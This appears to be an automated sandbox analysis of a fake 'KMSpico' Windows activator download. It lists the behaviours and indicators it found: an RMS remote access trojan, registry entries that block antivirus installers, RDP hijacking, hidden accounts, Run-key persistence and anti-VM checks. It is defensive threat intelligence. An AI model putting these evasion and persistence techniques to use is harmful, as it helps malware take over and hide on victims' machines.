rms | hxxps://kmspico10[.]com/windows-10-activator/

Analysis

max time kernel
270s
max time network
283s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
14-01-2025 16:26

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://kmspico10.com/windows-10-activator/

Score

10^/10

rms defense_evasion discovery evasion execution lateral_movement persistence privilege_escalation rat themida trojan

Malware Config

Signatures

RMS
Remote Manipulator System (RMS) is a remote access tool developed by Russian organization TektonIT.
trojan rat rms
Rms family
rms

Detected Nirsoft tools 2 IoCs

Free utilities often used by attackers which can steal passwords, product keys, etc.

resource	yara_rule
behavioral1/files/0x001500000001e0af-964.dat	Nirsoft
behavioral1/memory/5440-1007-0x000002A0F6E20000-0x000002A0F7230000-memory.dmp	Nirsoft

Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 6 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	KMS.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	update.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	IP.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	smss.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	unsecapp.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	KMSTools Lite.exe

Remote Service Session Hijacking: RDP Hijacking 1 TTPs 3 IoCs

Adversaries may hijack a legitimate user's remote desktop session to move laterally within an environment.

lateral_movement

RDP Hijacking

T1563.002

pid	Process
2444	net.exe
5516	cmd.exe
5520	net1.exe

Blocks application from running via registry modification 28 IoCs

Adds application to list of disallowed applications.

evasion

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\8 = "HitmanPro.exe"	KMS.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\12 = "AVbr.exe"	KMS.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\18 = "esetonlinescanner.exe"	KMS.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\24 = "Cureit.exe"	KMS.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\25 = "TDSSKiller.exe"	KMS.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\3 = "eis_trial_rus.exe"	KMS.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\14 = "KVRT.exe"	KMS.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\19 = "eset_nod32_antivirus_live_installer.exe"	KMS.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\22 = "bitdefender_avfree.exe"	KMS.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\10 = "Cezurity_Scanner_Pro_Free.exe"	KMS.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\23 = "drweb-12.0-ss-win.exe"	KMS.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\4 = "essf_trial_rus.exe"	KMS.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\26 = "eset_smart_security_premium_live_installer.exe"	KMS.exe
Key created	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun	KMS.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\7 = "ESETOnlineScanner_RUS.exe"	KMS.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\9 = "360TS_Setup_Mini.exe"	KMS.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\15 = "cureit.exe"	KMS.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\2 = "avast_free_antivirus_setup_online.exe"	KMS.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\13 = "AV_br.exe"	KMS.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\16 = "FRST64.exe"	KMS.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1"	KMS.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\1 = "eav_trial_rus.exe"	KMS.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\17 = "eset_internet_security_live_installer.exe"	KMS.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\20 = "MBSetup.exe"	KMS.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\21 = "PANDAFREEAV.exe"	KMS.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\5 = "hitmanpro_x64.exe"	KMS.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\6 = "ESETOnlineScanner_UKR.exe"	KMS.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\11 = "Cube.exe"	KMS.exe

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	cmd.exe

Modifies Windows Firewall 2 TTPs 1 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
5368	netsh.exe

Server Software Component: Terminal Services DLL 1 TTPs 1 IoCs

persistence

Terminal Services DLL

T1505.005

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDll = "%ProgramFiles%\\RDP Wrapper\\rdpwrap.dll"	RDPWinst.exe

Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Checks BIOS information in registry 2 TTPs 12 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	update.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	IP.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	smss.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	KMSTools Lite.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	KMS.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	update.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	IP.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	smss.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	unsecapp.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	unsecapp.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	KMSTools Lite.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	KMS.exe

Checks computer location settings 2 TTPs 5 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation	install.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation	update.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation	svchost.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation	smss.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation	winserv.exe

Executes dropped EXE 15 IoCs

pid	Process
5448	KMSTools Lite.exe
3272	GSetup.exe
4804	install.exe
1008	7zaxxx.exe
5440	KMSoffline_x64.exe
5992	KMS.exe
244	update.exe
2420	win.exe
432	svchost.exe
2724	IP.exe
4312	smss.exe
2328	unsecapp.exe
5956	winserv.exe
4604	winserv.exe
5384	RDPWinst.exe

Loads dropped DLL 1 IoCs

pid	Process
5568	svchost.exe

Modifies file permissions 1 TTPs 64 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
5376	icacls.exe
5628	icacls.exe
224	icacls.exe
452	icacls.exe
4484	icacls.exe
2204	icacls.exe
2760	icacls.exe
1100	icacls.exe
5576	icacls.exe
116	icacls.exe
116	icacls.exe
3540	icacls.exe
6116	icacls.exe
3188	icacls.exe
3184	icacls.exe
5164	icacls.exe
5880	icacls.exe
3472	icacls.exe
2596	icacls.exe
4200	icacls.exe
1480	icacls.exe
3164	icacls.exe
5028	icacls.exe
3524	icacls.exe
4940	icacls.exe
5044	icacls.exe
3188	icacls.exe
4520	icacls.exe
1448	icacls.exe
5892	icacls.exe
2204	icacls.exe
4704	icacls.exe
2720	icacls.exe
5528	icacls.exe
5108	icacls.exe
4940	icacls.exe
2204	icacls.exe
1576	icacls.exe
5024	icacls.exe
5736	icacls.exe
3196	icacls.exe
396	icacls.exe
3916	icacls.exe
5188	icacls.exe
4664	icacls.exe
5164	icacls.exe
5952	icacls.exe
1100	icacls.exe
5576	icacls.exe
5780	icacls.exe
4864	icacls.exe
1844	icacls.exe
4340	icacls.exe
4648	icacls.exe
4524	icacls.exe
5512	icacls.exe
4260	icacls.exe
5856	icacls.exe
424	icacls.exe
5860	icacls.exe
3968	icacls.exe
2324	icacls.exe
5712	icacls.exe
5060	icacls.exe

Themida packer 64 IoCs

Detects Themida, an advanced Windows software protection system.

themida

resource	yara_rule
behavioral1/files/0x000300000001e0f8-955.dat	themida
behavioral1/memory/5448-956-0x00007FF7BC130000-0x00007FF7BCDDA000-memory.dmp	themida
behavioral1/memory/5448-958-0x00007FF7BC130000-0x00007FF7BCDDA000-memory.dmp	themida
behavioral1/memory/5448-959-0x00007FF7BC130000-0x00007FF7BCDDA000-memory.dmp	themida
behavioral1/memory/5448-960-0x00007FF7BC130000-0x00007FF7BCDDA000-memory.dmp	themida
behavioral1/memory/5448-957-0x00007FF7BC130000-0x00007FF7BCDDA000-memory.dmp	themida
behavioral1/memory/5448-961-0x00007FF7BC130000-0x00007FF7BCDDA000-memory.dmp	themida
behavioral1/memory/5448-962-0x00007FF7BC130000-0x00007FF7BCDDA000-memory.dmp	themida
behavioral1/memory/5448-963-0x00007FF7BC130000-0x00007FF7BCDDA000-memory.dmp	themida
behavioral1/memory/5448-981-0x00007FF7BC130000-0x00007FF7BCDDA000-memory.dmp	themida
behavioral1/memory/5448-999-0x00007FF7BC130000-0x00007FF7BCDDA000-memory.dmp	themida
behavioral1/files/0x000300000001e6d5-1018.dat	themida
behavioral1/memory/5992-1031-0x00007FF7F5B30000-0x00007FF7F68AD000-memory.dmp	themida
behavioral1/memory/5992-1033-0x00007FF7F5B30000-0x00007FF7F68AD000-memory.dmp	themida
behavioral1/memory/5992-1034-0x00007FF7F5B30000-0x00007FF7F68AD000-memory.dmp	themida
behavioral1/memory/5992-1035-0x00007FF7F5B30000-0x00007FF7F68AD000-memory.dmp	themida
behavioral1/memory/5992-1032-0x00007FF7F5B30000-0x00007FF7F68AD000-memory.dmp	themida
behavioral1/memory/5992-1036-0x00007FF7F5B30000-0x00007FF7F68AD000-memory.dmp	themida
behavioral1/memory/5992-1037-0x00007FF7F5B30000-0x00007FF7F68AD000-memory.dmp	themida
behavioral1/memory/5992-1038-0x00007FF7F5B30000-0x00007FF7F68AD000-memory.dmp	themida
behavioral1/memory/5448-1040-0x00007FF7BC130000-0x00007FF7BCDDA000-memory.dmp	themida
behavioral1/memory/5992-1051-0x00007FF7F5B30000-0x00007FF7F68AD000-memory.dmp	themida
behavioral1/memory/244-1052-0x00007FF6B4300000-0x00007FF6B5300000-memory.dmp	themida
behavioral1/memory/5448-1053-0x00007FF7BC130000-0x00007FF7BCDDA000-memory.dmp	themida
behavioral1/memory/244-1055-0x00007FF6B4300000-0x00007FF6B5300000-memory.dmp	themida
behavioral1/memory/244-1056-0x00007FF6B4300000-0x00007FF6B5300000-memory.dmp	themida
behavioral1/memory/244-1054-0x00007FF6B4300000-0x00007FF6B5300000-memory.dmp	themida
behavioral1/memory/244-1057-0x00007FF6B4300000-0x00007FF6B5300000-memory.dmp	themida
behavioral1/memory/244-1059-0x00007FF6B4300000-0x00007FF6B5300000-memory.dmp	themida
behavioral1/memory/244-1058-0x00007FF6B4300000-0x00007FF6B5300000-memory.dmp	themida
behavioral1/memory/244-1070-0x00007FF6B4300000-0x00007FF6B5300000-memory.dmp	themida
behavioral1/memory/5448-1071-0x00007FF7BC130000-0x00007FF7BCDDA000-memory.dmp	themida
behavioral1/memory/244-1107-0x00007FF6B4300000-0x00007FF6B5300000-memory.dmp	themida
behavioral1/memory/5448-1131-0x00007FF7BC130000-0x00007FF7BCDDA000-memory.dmp	themida
behavioral1/memory/244-1153-0x00007FF6B4300000-0x00007FF6B5300000-memory.dmp	themida
behavioral1/memory/5448-1154-0x00007FF7BC130000-0x00007FF7BCDDA000-memory.dmp	themida
behavioral1/files/0x0008000000023d94-1177.dat	themida
behavioral1/files/0x0007000000023d95-1185.dat	themida
behavioral1/memory/4312-1191-0x00007FF6318E0000-0x00007FF632913000-memory.dmp	themida
behavioral1/memory/4312-1193-0x00007FF6318E0000-0x00007FF632913000-memory.dmp	themida
behavioral1/memory/4312-1194-0x00007FF6318E0000-0x00007FF632913000-memory.dmp	themida
behavioral1/memory/4312-1192-0x00007FF6318E0000-0x00007FF632913000-memory.dmp	themida
behavioral1/memory/4312-1197-0x00007FF6318E0000-0x00007FF632913000-memory.dmp	themida
behavioral1/memory/4312-1195-0x00007FF6318E0000-0x00007FF632913000-memory.dmp	themida
behavioral1/memory/4312-1196-0x00007FF6318E0000-0x00007FF632913000-memory.dmp	themida
behavioral1/memory/2724-1207-0x00007FF6A5D50000-0x00007FF6A77AE000-memory.dmp	themida
behavioral1/memory/2724-1208-0x00007FF6A5D50000-0x00007FF6A77AE000-memory.dmp	themida
behavioral1/memory/2724-1211-0x00007FF6A5D50000-0x00007FF6A77AE000-memory.dmp	themida
behavioral1/memory/2724-1213-0x00007FF6A5D50000-0x00007FF6A77AE000-memory.dmp	themida
behavioral1/memory/2724-1212-0x00007FF6A5D50000-0x00007FF6A77AE000-memory.dmp	themida
behavioral1/memory/2724-1210-0x00007FF6A5D50000-0x00007FF6A77AE000-memory.dmp	themida
behavioral1/memory/2724-1209-0x00007FF6A5D50000-0x00007FF6A77AE000-memory.dmp	themida
behavioral1/memory/244-1219-0x00007FF6B4300000-0x00007FF6B5300000-memory.dmp	themida
behavioral1/files/0x0007000000023da2-1233.dat	themida
behavioral1/memory/5448-1237-0x00007FF7BC130000-0x00007FF7BCDDA000-memory.dmp	themida
behavioral1/memory/2328-1251-0x00007FF7E4140000-0x00007FF7E573E000-memory.dmp	themida
behavioral1/memory/2328-1255-0x00007FF7E4140000-0x00007FF7E573E000-memory.dmp	themida
behavioral1/memory/2328-1253-0x00007FF7E4140000-0x00007FF7E573E000-memory.dmp	themida
behavioral1/memory/2328-1254-0x00007FF7E4140000-0x00007FF7E573E000-memory.dmp	themida
behavioral1/memory/2328-1249-0x00007FF7E4140000-0x00007FF7E573E000-memory.dmp	themida
behavioral1/memory/2328-1250-0x00007FF7E4140000-0x00007FF7E573E000-memory.dmp	themida
behavioral1/memory/2328-1248-0x00007FF7E4140000-0x00007FF7E573E000-memory.dmp	themida
behavioral1/memory/2724-1257-0x00007FF6A5D50000-0x00007FF6A77AE000-memory.dmp	themida
behavioral1/memory/4312-1275-0x00007FF6318E0000-0x00007FF632913000-memory.dmp	themida

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio = "C:\\ProgramData\\RealtekHD\\taskhostw.exe"	IP.exe

Checks whether UAC is enabled 1 TTPs 6 IoCs

evasion trojan

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	KMSTools Lite.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	KMS.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	update.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	IP.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	smss.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	unsecapp.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
47	href.li
48	href.li
49	href.li

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
633	ip-api.com

Modifies WinLogon 2 TTPs 1 IoCs

persistence

Winlogon Helper DLL

T1547.004

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1"	RDPWinst.exe

AutoIT Executable 52 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral1/memory/5448-958-0x00007FF7BC130000-0x00007FF7BCDDA000-memory.dmp	autoit_exe
behavioral1/memory/5448-959-0x00007FF7BC130000-0x00007FF7BCDDA000-memory.dmp	autoit_exe
behavioral1/memory/5448-960-0x00007FF7BC130000-0x00007FF7BCDDA000-memory.dmp	autoit_exe
behavioral1/memory/5448-961-0x00007FF7BC130000-0x00007FF7BCDDA000-memory.dmp	autoit_exe
behavioral1/memory/5448-962-0x00007FF7BC130000-0x00007FF7BCDDA000-memory.dmp	autoit_exe
behavioral1/memory/5448-963-0x00007FF7BC130000-0x00007FF7BCDDA000-memory.dmp	autoit_exe
behavioral1/memory/5448-981-0x00007FF7BC130000-0x00007FF7BCDDA000-memory.dmp	autoit_exe
behavioral1/memory/5448-999-0x00007FF7BC130000-0x00007FF7BCDDA000-memory.dmp	autoit_exe
behavioral1/memory/5992-1033-0x00007FF7F5B30000-0x00007FF7F68AD000-memory.dmp	autoit_exe
behavioral1/memory/5992-1034-0x00007FF7F5B30000-0x00007FF7F68AD000-memory.dmp	autoit_exe
behavioral1/memory/5992-1035-0x00007FF7F5B30000-0x00007FF7F68AD000-memory.dmp	autoit_exe
behavioral1/memory/5992-1036-0x00007FF7F5B30000-0x00007FF7F68AD000-memory.dmp	autoit_exe
behavioral1/memory/5992-1037-0x00007FF7F5B30000-0x00007FF7F68AD000-memory.dmp	autoit_exe
behavioral1/memory/5992-1038-0x00007FF7F5B30000-0x00007FF7F68AD000-memory.dmp	autoit_exe
behavioral1/memory/5448-1040-0x00007FF7BC130000-0x00007FF7BCDDA000-memory.dmp	autoit_exe
behavioral1/memory/5992-1051-0x00007FF7F5B30000-0x00007FF7F68AD000-memory.dmp	autoit_exe
behavioral1/memory/5448-1053-0x00007FF7BC130000-0x00007FF7BCDDA000-memory.dmp	autoit_exe
behavioral1/memory/244-1055-0x00007FF6B4300000-0x00007FF6B5300000-memory.dmp	autoit_exe
behavioral1/memory/244-1056-0x00007FF6B4300000-0x00007FF6B5300000-memory.dmp	autoit_exe
behavioral1/memory/244-1057-0x00007FF6B4300000-0x00007FF6B5300000-memory.dmp	autoit_exe
behavioral1/memory/244-1059-0x00007FF6B4300000-0x00007FF6B5300000-memory.dmp	autoit_exe
behavioral1/memory/244-1058-0x00007FF6B4300000-0x00007FF6B5300000-memory.dmp	autoit_exe
behavioral1/memory/244-1070-0x00007FF6B4300000-0x00007FF6B5300000-memory.dmp	autoit_exe
behavioral1/memory/5448-1071-0x00007FF7BC130000-0x00007FF7BCDDA000-memory.dmp	autoit_exe
behavioral1/memory/244-1107-0x00007FF6B4300000-0x00007FF6B5300000-memory.dmp	autoit_exe
behavioral1/memory/5448-1131-0x00007FF7BC130000-0x00007FF7BCDDA000-memory.dmp	autoit_exe
behavioral1/memory/244-1153-0x00007FF6B4300000-0x00007FF6B5300000-memory.dmp	autoit_exe
behavioral1/memory/5448-1154-0x00007FF7BC130000-0x00007FF7BCDDA000-memory.dmp	autoit_exe
behavioral1/memory/4312-1193-0x00007FF6318E0000-0x00007FF632913000-memory.dmp	autoit_exe
behavioral1/memory/4312-1194-0x00007FF6318E0000-0x00007FF632913000-memory.dmp	autoit_exe
behavioral1/memory/4312-1192-0x00007FF6318E0000-0x00007FF632913000-memory.dmp	autoit_exe
behavioral1/memory/4312-1197-0x00007FF6318E0000-0x00007FF632913000-memory.dmp	autoit_exe
behavioral1/memory/4312-1195-0x00007FF6318E0000-0x00007FF632913000-memory.dmp	autoit_exe
behavioral1/memory/4312-1196-0x00007FF6318E0000-0x00007FF632913000-memory.dmp	autoit_exe
behavioral1/memory/2724-1208-0x00007FF6A5D50000-0x00007FF6A77AE000-memory.dmp	autoit_exe
behavioral1/memory/2724-1211-0x00007FF6A5D50000-0x00007FF6A77AE000-memory.dmp	autoit_exe
behavioral1/memory/2724-1213-0x00007FF6A5D50000-0x00007FF6A77AE000-memory.dmp	autoit_exe
behavioral1/memory/2724-1212-0x00007FF6A5D50000-0x00007FF6A77AE000-memory.dmp	autoit_exe
behavioral1/memory/2724-1210-0x00007FF6A5D50000-0x00007FF6A77AE000-memory.dmp	autoit_exe
behavioral1/memory/2724-1209-0x00007FF6A5D50000-0x00007FF6A77AE000-memory.dmp	autoit_exe
behavioral1/memory/244-1219-0x00007FF6B4300000-0x00007FF6B5300000-memory.dmp	autoit_exe
behavioral1/memory/5448-1237-0x00007FF7BC130000-0x00007FF7BCDDA000-memory.dmp	autoit_exe
behavioral1/memory/2328-1251-0x00007FF7E4140000-0x00007FF7E573E000-memory.dmp	autoit_exe
behavioral1/memory/2328-1255-0x00007FF7E4140000-0x00007FF7E573E000-memory.dmp	autoit_exe
behavioral1/memory/2328-1253-0x00007FF7E4140000-0x00007FF7E573E000-memory.dmp	autoit_exe
behavioral1/memory/2328-1254-0x00007FF7E4140000-0x00007FF7E573E000-memory.dmp	autoit_exe
behavioral1/memory/2328-1249-0x00007FF7E4140000-0x00007FF7E573E000-memory.dmp	autoit_exe
behavioral1/memory/2328-1250-0x00007FF7E4140000-0x00007FF7E573E000-memory.dmp	autoit_exe
behavioral1/memory/2724-1257-0x00007FF6A5D50000-0x00007FF6A77AE000-memory.dmp	autoit_exe
behavioral1/memory/4312-1275-0x00007FF6318E0000-0x00007FF632913000-memory.dmp	autoit_exe
behavioral1/memory/244-1298-0x00007FF6B4300000-0x00007FF6B5300000-memory.dmp	autoit_exe
behavioral1/memory/5448-1304-0x00007FF7BC130000-0x00007FF7BCDDA000-memory.dmp	autoit_exe

Drops file in System32 directory 3 IoCs

description	ioc	Process
File created	C:\Windows\SysWOW64\unsecapp.exe	IP.exe
File opened for modification	C:\Windows\SysWOW64\unsecapp.exe	IP.exe
File created	C:\Windows\System32\rfxvmt.dll	RDPWinst.exe

Hide Artifacts: Hidden Users 1 TTPs 2 IoCs

defense_evasion

Hidden Users

T1564.002

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0"	reg.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 6 IoCs

pid	Process
5448	KMSTools Lite.exe
5992	KMS.exe
244	update.exe
2724	IP.exe
4312	smss.exe
2328	unsecapp.exe

Drops file in Program Files directory 33 IoCs

description	ioc	Process
File opened for modification	C:\Program Files (x86)\AVAST Software	update.exe
File opened for modification	C:\Program Files\Rainmeter	update.exe
File opened for modification	C:\Program Files\Loaris Trojan Remover	update.exe
File opened for modification	C:\Program Files\Process Lasso	update.exe
File opened for modification	C:\Program Files\ByteFence	update.exe
File opened for modification	C:\Program Files (x86)\Kaspersky Lab	update.exe
File opened for modification	C:\Program Files\Common Files\McAfee	update.exe
File opened for modification	C:\Program Files (x86)\360	update.exe
File created	C:\Program Files\Common Files\System\iediagcmd.exe	update.exe
File opened for modification	C:\Program Files\COMODO	update.exe
File opened for modification	C:\Program Files\Ravantivirus	update.exe
File created	C:\Program Files\RDP Wrapper\rdpwrap.dll	RDPWinst.exe
File opened for modification	C:\Program Files (x86)\Microsoft JDX	update.exe
File opened for modification	C:\Program Files\Bitdefender Agent	update.exe
File opened for modification	C:\Program Files\Cezurity	update.exe
File opened for modification	C:\Program Files (x86)\GRIZZLY Antivirus	update.exe
File opened for modification	C:\Program Files\RDP Wrapper	smss.exe
File opened for modification	C:\Program Files (x86)\SpyHunter	update.exe
File opened for modification	C:\Program Files (x86)\Cezurity	update.exe
File opened for modification	C:\Program Files\RDP Wrapper\rdpwrap.ini	smss.exe
File opened for modification	C:\Program Files\SpyHunter	update.exe
File opened for modification	C:\Program Files\Enigma Software Group	update.exe
File opened for modification	C:\Program Files\Malwarebytes	update.exe
File opened for modification	C:\Program Files\AVAST Software	update.exe
File opened for modification	C:\Program Files\AVG	update.exe
File opened for modification	C:\Program Files (x86)\AVG	update.exe
File opened for modification	C:\Program Files\Kaspersky Lab	update.exe
File opened for modification	C:\Program Files\DrWeb	update.exe
File opened for modification	C:\Program Files\Common Files\AV	update.exe
File created	C:\Program Files\RDP Wrapper\rdpwrap.ini	RDPWinst.exe
File opened for modification	C:\Program Files\Common Files\Doctor Web	update.exe
File opened for modification	C:\Program Files\ESET	update.exe
File opened for modification	C:\Program Files\HitmanPro	update.exe

Launches sc.exe 1 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
2252	sc.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

